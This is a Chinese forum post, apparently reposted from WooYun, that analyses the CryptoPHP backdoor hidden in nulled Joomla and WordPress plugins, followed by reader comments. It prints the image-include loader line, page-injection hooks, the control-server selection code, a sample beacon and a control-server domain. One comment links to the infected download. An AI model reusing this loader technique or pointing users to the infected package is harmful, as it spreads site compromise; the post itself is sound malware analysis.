安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > WooYun > WooYun-Zone > CryptoPHP后门分析报告 (WOOYUN)

CryptoPHP后门分析报告 (WOOYUN)

时间:2017-09-07来源: 作者:点击:
网络安全资讯、讨论,跨站师,渗透师,结界师聚集之地
杀戮 (有事请 at 大号园长) | 2014-11-28 16:08

简介

CryptoPHP最早由国外的小狐狸安全团队发现,并且发布了研究报告,由于报告死长死长的,一堆废话,我就不翻译了,就用我自己的话描述一遍。

当时研究员监控到客户的服务器对国外的域名进行了POST请求,客户服务器使用了国外著名的开源系统Joomla ,并且在这个之前管理员唯一可疑的行为就是安装了一个插件叫J-secure,但是来源是一个第三方网站。

[08/May/2014:12:44:10 +0100] "POST http://worldcute.biz/ HTTP/1.1" - - "-" "-"

PS:没有refer,没有USER-AGENT,虽然服务器总会发一些请求出现,但不会像这样。

研究员对多个第三方网站进行了调查,发现大量下载站中提供的开源系统插件被植入后门,我特意去国外的下载站下载了几个插件,发现后门近期刚进行了更新,应该是通过控制多个下载站,定期对后门进行版本更新,同时后门本身也具有版本跟新的功能。 //内容来自AnYun.ORG
网址: nulledstylez.com

1.jpg

可以很明显的看出日期的不同,查看Jsecure.php文件,发现被插入了

<?php include('images/social.png'); ?>

查看包含的图片:

658.jpg

小狐狸。。。不对。。。是FOX团队研究员对后门进行了分析,发现所具备的功能。

1. 后门开发中使用框架本身的函数。

2. 后门会将数据保存至数据库中。

3. 后门使用RSA加密与其他服务器进行通信。

4. 使用了大量的控制服务器,对后门服务器进行控制。

//安云网咨询系统


5. 支持直接由黑客进行手动控制。

6. 自动更新

7. 代码注入网页

8.代码执行

黑客对后门进行了大量开发使其支持嵌入Joomla ,WordPress,Drupal的插件。当后门被植入一个系统,后门会调用框架本身的函数添加一个管理员,来保证当后门被删除,黑客仍拥有网站的控制权限。

到现在为止后门已经经过多个版本跟新。

$ANVoslonRNQSwwQloQTx[ 'ver' ] = 1.0;

这是我手里的,目前最新版本是 1.0a 。

先来看看后门本身使用的开发技术,我指讲几个有亮点的。


后门本身使用了大量的框架本身的函数,比如

WordPress 的 add_action

add_action('wp_head', array( $this, 'JLKCxmYDqGERxDYMhmOj' ));

add_action('wp_footer', array( $this, 'JLKCxmYDqGERxDYMhmOj' ));

//安云网咨询系统

joomla 的JResponse:getBody() and JResponse:setBody()

$NEKXukygfLoADkopeheR = JResponse::getBody();
JResponse::setBody($NEKXukygfLoADkopeheR);


让我深深怀疑该黑客之前是做开源系统二次开发的.

通信

后门本身使用了RSA加密来保证只有黑客或者控制服务器能够对后门服务器进行操作。

整个过程  后门植入->生成标示符| 生成秘钥 ->发送到控制服务器 -> 控制服务器响应->后门通信完成

后门本身包含一份控制服务器的LIST,初始化的时候随机挑选一台进行通信,提供一份代码实例

private function randomize_domain($domains, $max_domains) {
      $count = count($domains);
       if ($count <= $max_domains) {
             return $domains;
       }
//ANYUN.ORG

       $result[] = array();
       $domain_indexes = array();
       $domain_count = 0;
       $counter = 0;
       while (TRUE) {
          $counter++;
          $index = md5_index($this->domain . $counter, $count);
          if (in_array($index, $domain_indexes)) {
                    continue;
          }
          $domain_indexes[] = $index;
          $domain_count++;
          if ($domain_count == $max_domains) { //内容来自AnYun.ORG
                break;
          }
        }
        foreach ($domain_indexes as $idx) {
                $result[] = $domains[$idx];
        }
        return $result;
}

private function md5_index($domain, $count) {
       $md5_domain = hash("md5", $domain);
       $index = (preg_replace("/[^0-9,.]/", "", $md5_domain));
       while ($index > 10000000) {
               $index /= 100000; //本文来自安云网
       }
       $index %= $count;
       return $index;
}


后门服务器请求示例:

{ "empty": 0, "eval": true, "exec": true, "host": "http://127.0.0.1/", "ip": "127.0.0.1", "last_connect": "20141116", "page": "index.php", "publicKey": "-----BEGIN PUBLIC KEY-----[snipped..]", "run": 4, "serverKey": "BtajD2R2yR", "started": "20141114", "type": 0, "ver": 1 }

其他没什么特点的东西就不说了,说个有趣的事吧。

小狐狸团队也对作者进行了追踪,发现了下面一段代码

if($_SERVER['HTTP_USER_AGENT']=='chishijen12') {

    error_reporting(E_ALL); ini_set('display_errors',1); //copyright AnYun.ORG

}


chishijen12 显然是一个作者的标示,因为看着怎么那么像拼音我就去查了查,结果发现这样的推特。

0327.jpg

意思就是 chishi在 中文的意思是"食物",不管怎么说,有机会见到他我就砍死他。

其中老外使用的控制服务器多搭几百台,中马的网站多达数十万,已经是僵尸网络的级别了。

//内容来自AnYun.ORG

分享到:
  1. 1#
    回复此人 感谢
    Chu (学习ing。) | 2014-11-28 16:10

    最近很高产啊 //内容来自安云网

  2. 2#
    回复此人 感谢
    园长 (喵~) | 2014-11-28 16:13

    @Chu job //安云网咨询系统

  3. 3#
    回复此人 感谢
    园长 (喵~) | 2014-11-28 16:14

    @Chu 好吧,英文太差。。。不发扣工资

    //本文来自安云网

  4. 4#
    回复此人 感谢
    浮萍 | 2014-11-28 16:22

    //安云网咨询系统

  5. 5#
    回复此人 感谢
    RainShine (I'm your angel of music.) | 2014-11-28 16:33

    //本文来自安云网

  6. 6#
    回复此人 感谢
    _Thorns (创业公司招聘系统运维、软件逆向、数据可视化攻城狮。) | 2014-11-28 17:11

    //copyright AnYun.ORG

  7. 7#
    回复此人 感谢
    冷冷的夜 (1) | 2014-11-28 19:47

    chishi在 中文的意思是"食物"............ //copyright AnYun.ORG

  8. 8#
    回复此人 感谢
    泳少 (此号被射!by U神) | 2014-11-28 20:06

    超赞~ //内容来自安云网

  9. 9#
    回复此人 感谢
    小胖子 (z7y首席代言人,园长的表哥...) | 2014-11-28 20:12

    吃屎。。。。。。。。。。 //内容来自AnYun.ORG

  10. 10#
    回复此人 感谢
    疯子 (世人笑我太疯癫,我笑世人看不穿。) | 2014-11-28 20:20

    chi shi!!!

    //安云网咨询系统

  11. 11#
    回复此人 感谢
    端端 | 2014-11-29 11:34

    其实是当成“吃食”了吧……

    //安云网咨询系统

  12. 12#
    回复此人 感谢
    jusker (http://www.jusker.com) | 2014-11-29 13:09

    good job //安云网咨询系统

  13. 13#
    回复此人 感谢
    answer | 2014-11-29 16:08

    chi shi!!! //本文来自安云网

  14. 14#
    回复此人 感谢
    我了个去 | 2014-11-29 16:19

    at the 'chi shi' part ,meaning 'Food' 。。。

    //内容来自安云网

  15. 15#
    回复此人 感谢
    掳人甲 | 2014-11-29 19:58

    QQ截图20141129195710.png //安云网,anyun.org
    擦。下载了个wordpress主题和这个一模一样 差点中招。。 //copyright AnYun.ORG

  16. 16#
    回复此人 感谢
    wefgod (求大牛指点) | 2014-11-29 21:12

    chishi……

    //内容来自AnYun.ORG

  17. 17#
    回复此人 感谢
    杀戮 (有事请 at 大号园长) | 2014-11-29 21:19

    @掳人甲 看下后门版本多少? //ANYUN.ORG

  18. 18#
    回复此人 感谢
    掳人甲 | 2014-11-30 22:58

    @杀戮 1.0

    //ANYUN.ORG

  19. 19#
    回复此人 感谢
    Matt | 2014-12-01 21:05

    能否吧png的源文件发出来 分析一下 //copyright AnYun.ORG

  20. 20#
    回复此人 感谢
    杀戮 (有事请 at 大号园长) | 2014-12-01 21:46

    @Matt 下载这个就行了 http://nulledstylez.com/jsecure-authentication-v3-0-for-joomla-3-0-extension/ //内容来自AnYun.ORG

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容